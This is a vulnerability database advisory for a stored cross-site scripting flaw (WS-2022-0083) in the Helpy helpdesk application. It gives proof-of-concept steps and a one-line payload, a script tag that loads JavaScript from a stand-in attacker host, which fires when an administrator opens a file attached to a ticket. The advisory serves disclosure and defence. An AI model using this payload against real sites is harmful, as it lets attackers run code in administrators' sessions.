Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

WS-2022-0083

Date: February 16, 2022

Overview

Helpy application in versions 1.0 to 2.8.0 is affected by Stored XSS vulnerability, where an unprivileged user can upload an HTML file that contains malicious JavaScript while creating a ticket.

Details

The “Helpy” application is affected by “Stored XSS” vulnerability, where an unprivileged user can upload an HTML file that contains malicious JavaScript while creating a ticket.

PoC Details

Access the application and click on “Open a Ticket”. Now fill up the details and upload the malicious HTML file (which contains the payload in PoC Code Section) and create a ticket. Now login into the application as administrator. Open the recent ticket received in the admin portal. All the information along with the attached HTML file can be seen. Click on the HTML file to open. XSS will be triggered after opening the file.

PoC Code

<script src=http://attacker-site.com/a.js></script>

Affected Environments

1.0 to 2.8.0

Prevention

No fix

Language: Ruby

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

Related Resources (2)

https://github.com/helpyio/helpy/blob/2.8.0/app/controllers/topics_controller.rb#L120
https://www.mend.io/vulnerability-database/WS-2022-0083